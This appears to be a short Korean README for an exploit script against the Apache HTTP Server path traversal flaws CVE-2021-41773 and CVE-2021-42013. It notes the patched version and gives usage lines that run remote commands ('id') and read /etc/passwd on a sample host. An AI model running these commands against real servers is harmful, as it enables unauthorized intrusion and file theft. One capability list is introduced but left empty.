
CVE-2021-41773 & CVE-2021-42013
이 취약점들은 Apache HTTP Server 2.4.49 및 2.4.50에 영향을 미치는 심각한 경로 탐색 취약점입니다. 이를 통해 공격자는 다음을 수행할 수 있습니다:
두 취약점 모두 Apache 2.4.51에서 패치되었습니다. 즉시 업그레이드할 것을 강력히 권장합니다.
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
예제
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"

이 익스플로잇 스크립트는 승인된 보안 테스트, 방어적 연구 및 교육 목적으로만 사용됩니다.